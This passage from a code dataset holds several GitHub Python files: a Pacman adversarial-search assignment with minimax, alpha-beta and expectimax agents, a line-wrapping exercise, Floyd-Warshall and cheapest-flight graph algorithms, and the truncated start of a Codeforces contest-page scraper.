max(scores)\n bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]\n chosenIndex = random.choice(bestIndices) # Pick randomly among the best\n\n \"Add more of your code here if you want to\"\n\n return legalMoves[chosenIndex]\n\n def evaluationFunction(self, currentGameState, action):\n \"\"\"\n Design a better evaluation function here.\n\n The evaluation function takes in the current and proposed successor\n GameStates (pacman.py) and returns a number, where higher numbers are better.\n\n The code below extracts some useful information from the state, like the\n remaining food (newFood) and Pacman position after moving (newPos).\n newScaredTimes holds the number of moves that each ghost will remain\n scared because of Pacman having eaten a power pellet.\n\n Print out these variables to see what you're getting, then combine them\n to create a masterful evaluation function.\n \"\"\"\n # Useful information you can extract from a GameState (pacman.py)\n successorGameState = currentGameState.generatePacmanSuccessor(action)\n newPos = successorGameState.getPacmanPosition()\n newFood = successorGameState.getFood()\n newGhostStates = successorGameState.getGhostStates()\n newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]\n\n \"*** YOUR CODE HERE ***\"\n currPos = currentGameState.getPacmanPosition()\n currFood = currentGameState.getFood()\n #store food as a list, to compare lengths of foodLists to find food score\n foodList = currFood.asList()\n newFoodList = newFood.asList()\n #calculate ghost score, set default ghost score to be zero\n ghostScore = 0\n #get the new ghost positions\n newGhostPositions = successorGameState.getGhostPositions()\n #set the minGhostDistance to be the manhattan distance of the new pacman position to the first ghost\n #we will use this as a basis of comparison to find the closest ghost to pacmans new position\n minGhostDistance = util.manhattanDistance(newPos, newGhostPositions[0])\n for ghost in newGhostPositions:\n if minGhostDistance > util.manhattanDistance(newPos, ghost):\n #if the manhattanDistance of a ghost is less than the current minGhost distance\n #set the minGhost distance to be the manhattanDistance of the new ghost\n minGhostDistance = util.manhattanDistance(newPos, ghost)\n #check the minimum ghost distance, and assign a negative value accordingly\n #if no ghost is scared (all scared timers are zero), being close to a ghost is really bad\n if max(newScaredTimes) == 0:\n # if the ghost is closer, the ghostscore is a more negative number\n # half ghost score for each tile the ghost gets further from the pacman position\n # once ghost distance is larger than 4, ghost distance becomes 0\n # that means the closest ghost is at least five tiles away from pacman, and not currently a problem\n if minGhostDistance <= 2:\n ghostScore = -50\n elif minGhostDistance <= 3:\n ghostScore = -25\n elif minGhostDistance <= 4:\n ghostScore = -12\n else:\n ghostScore = 0\n #if the ghosts are scared, being close to a ghost isn't the worst, but best to not get too close\n else:\n #if pacman is one tile away from a ghost, large negative penalty\n #once pacman is two or 3 tiles away, the penalty decreases, since ghosts are not dangerous when scared\n #once larger than 3 tiles away, ghosts are not a threat while scared, so no penalty occurs\n if minGhostDistance == 1:\n ghostScore = -25\n elif minGhostDistance <=3:\n ghostScore = -5\n else:\n ghostScore = 0\n\n foodScore = 0\n #if the length of the newFoodList is less than the length of the currentFoodList\n #pacman has collected food in his new state\n #if pacman has collected no food, the lengths of both lists will be the same\n #in that case, foodScore will be 1/ the minimum manhattan distance to the closest food\n #this allows foodScore to increase the closer pacman is to food\n #without giving so much incentive toward the food that pacman runs himself into ghosts\n if len(foodList) - len(newFoodList) != 0:\n foodScore = 1 * len(foodList) - len(newFoodList)\n else:\n minFoodDistance = manhattanDistance(newPos, newFoodList[0])\n for food in newFoodList:\n if minFoodDistance > manhattanDistance(newPos, food):\n minFoodDistance = manhattanDistance(newPos, food)\n foodScore = 1 /float(minFoodDistance)\n #pacman is penalized for taking actions that do not decrease the amount of food left on the board\n remainingFoodPenalty = len(newFoodList)\n\n #total the ghostScore, foodScore, and the penalty for remainingFood\n return ghostScore + foodScore - remainingFoodPenalty\n\ndef scoreEvaluationFunction(currentGameState):\n \"\"\"\n This default evaluation function just returns the score of the state.\n The score is the same one displayed in the Pacman GUI.\n\n This evaluation function is meant for use with adversarial search agents\n (not reflex agents).\n \"\"\"\n return currentGameState.getScore()\n\nclass MultiAgentSearchAgent(Agent):\n \"\"\"\n This class provides some common elements to all of your\n multi-agent searchers. Any methods defined here will be available\n to the MinimaxPacmanAgent, AlphaBetaPacmanAgent & ExpectimaxPacmanAgent.\n\n You *do not* need to make any changes here, but you can if you want to\n add functionality to all your adversarial search agents. Please do not\n remove anything, however.\n\n Note: this is an abstract class: one that should not be instantiated. It's\n only partially specified, and designed to be extended. 
Agent (game.py)\n is another abstract class.\n \"\"\"\n\n def __init__(self, evalFn = 'scoreEvaluationFunction', depth = '2'):\n self.index = 0 # Pacman is always agent index 0\n self.evaluationFunction = util.lookup(evalFn, globals())\n self.depth = int(depth)\n\nclass MinimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent (question 2)\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the minimax action from the current gameState using self.depth\n and self.evaluationFunction.\n\n Here are some method calls that might be useful when implementing minimax.\n\n gameState.getLegalActions(agentIndex):\n Returns a list of legal actions for an agent\n agentIndex=0 means Pacman, ghosts are >= 1\n\n gameState.generateSuccessor(agentIndex, action):\n Returns the successor game state after an agent takes an action\n\n gameState.getNumAgents():\n Returns the total number of agents in the game\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n def maxValue(state, depth, agentIndex):\n #if terminal tests return utility\n if depth == self.depth or state.isLose() or state.isWin():\n return self.evaluationFunction(state)\n #initializing v to be -infinity\n v = float('-inf')\n #loop through actions and find max score\n for action in state.getLegalActions(agentIndex):\n successorState = state.generateSuccessor(agentIndex, action)\n #this finds the max of the minimum values\n v = max(v, minValue(successorState, depth, 1))\n return v\n\n\n def minValue(state, depth, agentIndex):\n #if terminal tests, return utility\n if depth == self.depth or state.isLose() or state.isWin():\n return self.evaluationFunction(state)\n v = float('inf')\n #loop through actions for agentIndex\n for action in state.getLegalActions(agentIndex):\n #if the agentIndex is a ghost agent, continue to call minValue\n if agentIndex < state.getNumAgents() - 1:\n successorState = state.generateSuccessor(agentIndex, action)\n v = min(v, minValue(successorState, depth, agentIndex + 1))\n #once minValue of all ghost agents has been found, increase depth, and find the maxValue of pacman\n else:\n successorState = state.generateSuccessor(agentIndex, action)\n #this will return the smallest maxValue\n v = min(v, maxValue(successorState, depth + 1, 0))\n return v\n\n def minimaxDecision():\n #initialize v to be -infinity\n v = float('-inf')\n #loop through pacman's legal actions\n for action in gameState.getLegalActions(0):\n #find successor pacman state based on action\n successorState = gameState.generateSuccessor(0, action)\n #find the action with the highest min value\n score = minValue(successorState, 0, 1)\n # if an action has a higher minValue, update v to be score of the new action\n #update bestAction to be the new highest min value\n if score > v:\n v = score\n bestAction = action\n return bestAction\n return minimaxDecision()\n\n util.raiseNotDefined()\n\nclass AlphaBetaAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent with alpha-beta pruning (question 3)\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the minimax action using self.depth and self.evaluationFunction\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n def maxValue(state, alpha, beta, depth, agentIndex):\n v = float('-inf')\n #if terminal tests return utility\n if depth == self.depth or state.isWin() or state.isLose():\n return self.evaluationFunction(state)\n #loop through pacmans actions\n for action in state.getLegalActions():\n successorState = state.generateSuccessor(agentIndex, action)\n #find the largest minValue\n v = max(v, 
minValue(successorState, alpha, beta, depth, 1))\n #stop searching tree early if value is greater than beta\n if v > beta:\n return v\n #update alpha to be the max of v and alpha\n alpha = max(alpha, v)\n return v\n def minValue(state, alpha, beta,depth, agentIndex):\n v = float('inf')\n if depth == self.depth or state.isWin() or state.isLose():\n return self.evaluationFunction(state)\n #loop through current agents actions\n for action in state.getLegalActions(agentIndex):\n successorState = state.generateSuccessor(agentIndex, action)\n #if agent is a ghost, get smallest minValue\n if agentIndex < state.getNumAgents() - 1:\n v = min(v, minValue(successorState, alpha, beta, depth, agentIndex + 1))\n #once all of the minValues for the ghosts have been found\n #find the smallest maxValue for pacman\n else:\n v = min(v, maxValue(successorState, alpha, beta, depth + 1, 0))\n #stop searching tree early if value is less than alpha\n if v < alpha:\n return v\n #update beta to be the min of v and beta\n beta = min(beta, v)\n return v\n def alphabetadecision():\n v = float('-inf')\n alpha = float('-inf')\n beta = float('inf')\n for action in gameState.getLegalActions():\n successorState = gameState.generateSuccessor(0, action)\n score = minValue(successorState, alpha, beta, 0 , 1)\n #if an action has a higher min score, update v to be score\n #update bestAction to be action\n if score > v:\n v = score\n bestAction = action\n #update alpha to be the max of v and alpha\n alpha = max(alpha, v)\n return bestAction\n return alphabetadecision()\n\n\n\n\n\nclass ExpectimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your expectimax agent (question 4)\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the expectimax action using self.depth and self.evaluationFunction\n\n All ghosts should be modeled as choosing uniformly at random from their\n legal moves.\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n\n def value(depth, agent, state):\n # run evaluation function if terminal state or max depth has been reached\n if state.isWin() or state.isLose() or depth == self.depth:\n return (self.evaluationFunction(state), Directions.STOP)\n\n # Max val will only accept pacman\n if agent == 0:\n return max_val(depth, agent, state)\n else:\n # Run expectimax on all ghost agents\n return exp_val(depth, agent, state)\n\n def max_val(depth, agent, state):\n \"\"\"Evaluates max node similar to minimax\"\"\"\n v = (float(\"-inf\"), None) # initialize max score\n\n # get all legal actions for pacman\n actions = state.getLegalActions(agent)\n\n # increment index for successive states\n successorIndex = agent + 1\n # if legal actions exist\n if actions:\n # iterate through actions\n for action in actions:\n # generate successor state\n successorState = state.generateSuccessor(agent, action)\n # pass to value to run expectimax on the ghosts\n successorVal = value(depth, successorIndex, successorState)\n # replace existing value if expectimax returns a larger value\n v = max([v, (successorVal[0], action)], key=lambda x: x[0])\n else:\n # if no available actions, run evaluation function\n return value(self.depth, 0, state)\n\n return v\n\n def exp_val(depth, agent, state):\n \"\"\"Evaluates chance nodes with uncertain outcomes using weighted average of successive nodes\"\"\"\n v = (0, None) # initialize expectimax value for ghosts\n #grab legal actions for ghost\n actions = state.getLegalActions(agent)\n\n successorIndex = agent + 1\n # if the index reaches the number of agents, pacman is next agent\n #this will only occur after expectimax runs on all ghosts\n if gameState.getNumAgents() == successorIndex:\n successorIndex = 0\n depth += 1\n\n num_actions = len(actions)\n if actions:\n for action in actions:\n #generate successor to agent\n successorState = state.generateSuccessor(agent, action)\n #find the value of the successor\n successorVal = value(depth, successorIndex, successorState)\n # running total of children's expectimax values\n v_sum = v[0] + successorVal[0]\n v = (v_sum, action)\n # weight the sum of expected values\n # with the probability of an action occurring over all available actions (uniform distribution)\n v = (v[0] / float(num_actions), None)\n else:\n # if no available actions, run evaluation function\n return value(self.depth, 0, state)\n\n return v\n\n # return expectimax action\n return value(0, 0, gameState)[1]\n util.raiseNotDefined()\n\ndef betterEvaluationFunction(currentGameState):\n \"\"\"\n Your extreme ghost-hunting, pellet-nabbing, food-gobbling, unstoppable\n evaluation function (question 5).\n\n DESCRIPTION: \n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # State data\n newPos = currentGameState.getPacmanPosition()\n newFood = currentGameState.getFood()\n newGhostStates = currentGameState.getGhostStates()\n newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]\n\n # GHOSTS\n #if ghosts are close and scared, or far away add points, if ghosts are not scared and close, lose points\n sumGhostDist = 0\n minGhostDist = (float(\"inf\"), None)\n scaredBonus = 0\n for ghost in newGhostStates:\n ghostPos = ghost.getPosition()\n ghostDist = manhattanDistance(newPos, ghostPos)\n # finding the minimum ghost position from the current position in order to determine contingencies\n minGhostDist = min(minGhostDist, (ghostDist, ghostPos), key=lambda x: x[0])\n #if ghosts are scared, no penalties for being close to a ghost will occur\n #give incentive for pacman to eat ghosts while they are scared\n if ghost.scaredTimer > 0:\n scaredBonus += 30 * len(newGhostStates)\n else:\n #If ghost is further than one tile away, don't worry about ghost\n #Increase score by small amount\n if ghostDist > 1:\n sumGhostDist += 1 / float(ghostDist) # 1/ghost_dist to increment sum relative to the current ghost\n # if at 1 place or closer decrease score, not a valid move for the current state\n elif ghostDist > 0:\n sumGhostDist -= 60 * 1 / float(ghostDist) # DANGER - decrement by a LARGE and relative value\n # Final ghost metric for game score\n ghostScore = scaredBonus + sumGhostDist\n # FOOD\n \"\"\"Food is usually abundant and is clustered next to other food nodes so pacman tries to \n follow a trail or clear a majority of the nodes in an area before moving on\"\"\"\n foodList = newFood.asList()\n minFoodDist = (float(\"inf\"), None)\n foodScore = 0\n for foodPos in foodList:\n foodDist = manhattanDistance(newPos, foodPos)\n #find the closest food to pacman by using smallest manhattan distance\n minFoodDist = min(minFoodDist, (foodDist, foodPos), key=lambda x: x[0])\n foodScore = 0\n # check if there is a food node stranded in the farther end of the board\n # and move towards the node if a ghost is not obstructing the path\n if minGhostDist and minFoodDist[1]:\n if minFoodDist[0] > minGhostDist[0] and not ( \\\n newPos[0] < minGhostDist[1][0] < minFoodDist[1][0] and newPos[1] < minGhostDist[1][1] <\n minFoodDist[1][1] and \\\n newPos[0] > minGhostDist[1][0] > minFoodDist[1][0] and newPos[1] > minGhostDist[1][1] >\n minFoodDist[1][1]):\n foodScore += 15\n # if a food node exists right next to pacman, add a large number to make pacman eat food\n
 #decrease foodScore bonus as min distance becomes further away\n if minFoodDist[0] <= 1:\n foodScore += 40\n elif minFoodDist[0] <= 2:\n foodScore += 25\n elif minFoodDist[0] <= 3:\n foodScore += 15\n\n foodScore += 10 / float(minFoodDist[0])\n foodPenalty = -len(foodList)\n foodScore += foodPenalty\n # PELLET\n powerPellets = currentGameState.getCapsules()\n powerPelletProximityBonus = 0\n minPowerPelletDist = float(\"inf\")\n if powerPellets:\n for pelletPos in powerPellets:\n # get distance to closest power pellet\n minPowerPelletDist = min(minPowerPelletDist, manhattanDistance(newPos, pelletPos))\n #if ghosts are not already scared\n #and a power pellet is closer than the min ghost distance\n #give incentive for pacman to grab powerpellet\n if abs(minGhostDist[0] - minPowerPelletDist) < 2 and max(newScaredTimes) == 0:\n powerPelletProximityBonus += 20\n powerPelletProximityBonus += (\n 10 / float(minPowerPelletDist if minPowerPelletDist > 0 else 10))\n\n # total gameState score, foodScore, ghostScore, and the powerPellet bonus to get final score\n finalScore = currentGameState.getScore() + foodScore + ghostScore + powerPelletProximityBonus\n\n return finalScore\n util.raiseNotDefined()\n\n# Abbreviation\nbetter = betterEvaluationFunction\n\n","repo_name":"dpsholtes/Pacman-AI","sub_path":"multiagent/multiAgents.py","file_name":"multiAgents.py","file_ext":"py","file_size_in_byte":22502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
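The MinimaxAgent/AlphaBetaAgent pair above prunes exactly when a node's value escapes the (alpha, beta) window. The same mechanics are easier to verify on a hand-built tree than on Pacman GameState objects; the toy below is illustrative only, using nested lists for internal nodes and numbers for leaf evaluations:

```python
# Alpha-beta on a toy depth-2 tree (leaves are static evaluations).
def alphabeta(node, maximizing, alpha=float('-inf'), beta=float('inf')):
    if isinstance(node, (int, float)):  # leaf node
        return node
    if maximizing:
        v = float('-inf')
        for child in node:
            v = max(v, alphabeta(child, False, alpha, beta))
            if v > beta:        # the MIN node above would never allow this branch
                return v
            alpha = max(alpha, v)
        return v
    v = float('inf')
    for child in node:
        v = min(v, alphabeta(child, True, alpha, beta))
        if v < alpha:           # the MAX node above would never allow this branch
            return v
        beta = min(beta, v)
    return v

tree = [[3, 12, 8], [2, 4, 6], [14, 5, 2]]  # MAX to move over three MIN nodes
print(alphabeta(tree, True))  # 3
```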
+{"seq_id":"9922020130","text":"\r\n\r\nlines=[]\r\nflines=[]\r\ninp_file= input(\"Enter the input filename:\\n\")\r\nout_file= input(\"Enter the output filename:\\n\")\r\nleng=int(input(\"Enter the line width:\\n\"))\r\nrem=\"\"\r\nfile=open(inp_file,\"r\")\r\ncount=0\r\n\r\nfor line in file:\r\n rem=line\r\n while len(rem)>leng:\r\n k=rem[0:leng]\r\n s=k.rfind(\" \")\r\n \r\n lines.append(rem[0:s])\r\n rem=rem[s:len(rem)]\r\n\r\nlines.append(rem) \r\n\r\n\r\n\r\nfile.close()\r\n \r\n\r\noutfile=open(out_file,\"w\")\r\n\r\nfor i in range(len(lines)):\r\n if lines[i] and lines[i][0]==\" \":\r\n lines[i]=lines[i][1:]\r\n print(lines[i], file=outfile)\r\n\r\n\r\noutfile.close()\r\n\r\n\r\n ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/gvnser004/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"9979177315","text":"#title#\n# Floyd-Warshall algorithm\n#subtitle#\n# warshall_floyd: builds the table of shortest paths between all pairs of vertices\n# O(N^3)\n\n#name#\n# Floyd-Warshall algorithm\n#discription#\n# All-pairs shortest paths\n# d[i][j] stores the cost of moving between vertices i and j; n is the number of vertices\n# O(N^3)\n#body#\nimport copy\n\nclass warshall_floyd:\n def __init__(self, n:int) -> None:\n self.INF = float(\"inf\")\n self.n = n\n self.d = [[self.INF] * n for _ in range(n)]\n #d[u][v] : cost of edge uv (inf when the edge does not exist)\n for i in range(n):\n self.d[i][i] = 0 #cost of going to the same vertex is 0\n\n\n def build(self):\n n = self.n\n wf = copy.deepcopy(self.d)\n for k in range(n):\n for i in range(n):\n for j in range(n):\n wf[i][j] = min(wf[i][j], wf[i][k] + wf[k][j])\n self.wf = wf #wf[i][j] holds the shortest distance between vertices i and j\n\n\n def add_edge(self, fm, to, cost):\n self.d[fm][to] = cost\n\n\n # negative-cycle detection\n @property\n def is_neg_cycle(self) -> bool:\n for i in range(self.n):\n if self.wf[i][i] < 0:\n return True\n return False\n\n\n # path reconstruction\n def path(self, s, g):\n ret = []\n if s == g or self.wf[s][g] == self.INF:\n return ret\n cur = s\n while cur!=g:\n for nxt in range(self.n):\n if nxt==cur or nxt==s: continue\n if self.d[cur][nxt] + self.wf[nxt][g] == self.wf[cur][g]:\n ret.append((cur, nxt))\n # ret.append((nxt, cur))\n cur = nxt\n break\n return ret\n\n##############################\n\nn, m = map(int,input().split()) #n: number of vertices, m: number of edges\n\nWF = warshall_floyd(n)\n\nfor _ in range(m):\n _u, _v, _w = map(int,input().split())\n _u -= 1; _v -= 1\n WF.add_edge(_u, _v, _w)\n WF.add_edge(_v, _u, _w)\n\nWF.build()\n\nprint(WF.path(0, n-1))\n\n#prefix#\n# Lib_SP_最短経路探索_warshall\n#end#\n","repo_name":"ibtosmlin/atcoder","sub_path":"lib/lib/Lib_SP_ワーシャルフロイド.py","file_name":"Lib_SP_ワーシャルフロイド.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"14031880200","text":"'''\n\n 787. Cheapest Flights Within K Stops\n\n'''\n\nfrom collections import defaultdict\nimport heapq\n\n\nclass SolutionRef:\n def findCheapestPrice(self, n, flights, src, dst, k):\n prices = [float('inf')] * n\n prices[src] = 0\n \n for i in range(k + 1):\n tempPrices = prices.copy()\n \n for s, d, p in flights: # source, destination, price\n if prices[s] == float('inf'): \n continue\n if prices[s] + p < tempPrices[d]:\n tempPrices[d] = prices[s] + p\n \n prices = tempPrices\n \n return -1 if prices[dst] == float('inf') else prices[dst]\n\n\n\n\nclass Solution:\n def findCheapestPrice(self, n, flights, src, dst, k):\n prices = [float('inf')] * n\n prices[src] = 0\n \n for _ in range(k + 1):\n temp = prices.copy()\n \n for fr, to, cost in flights:\n # skip sources that are still unreachable (was flights[fr], a bug)\n if prices[fr] == float('inf'): continue\n temp[to] = min(temp[to], prices[fr] + cost)\n \n prices = temp\n \n return prices[dst] if prices[dst] != float('inf') else -1\n\n \n \ndef runSolution():\n solution = Solution()\n \n print(solution.findCheapestPrice(\n n = 4, flights = [[0,1,100],[1,2,100],[2,0,100],[1,3,600],[2,3,200]], src = 0, dst = 3, k = 1))\n print(solution.findCheapestPrice(\n n = 3, flights = [[0,1,100],[1,2,100],[0,2,500]], src = 0, dst = 2, k = 1))\n pass\nrunSolution()","repo_name":"AlexanderDLe/Python_DataStructuresAndAlgorithms","sub_path":"Graph/CheapestFlightsWithinKStops.py","file_name":"CheapestFlightsWithinKStops.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"28511332377","text":"import requests, json\nimport os\n\ndef get_contest_name(url):\n while True: \n page = requests.get(url).text\n pos = page.find('content=\"Dashboard - ')\n if pos == -1:\n print('Please wait until the contest starts ...', end = '\\r')\n else:\n break\n \n pos += len('content=\"Dashboard - ')\n ans = page[pos:page.find(' - Codeforces', pos)]\n return ans\n\ndef get_problems_list(url):\n page = requests.get(url).text\n ans = []\n page = page[page.find('generalAnnouncement'):]\n while True:\n nxt = page.find('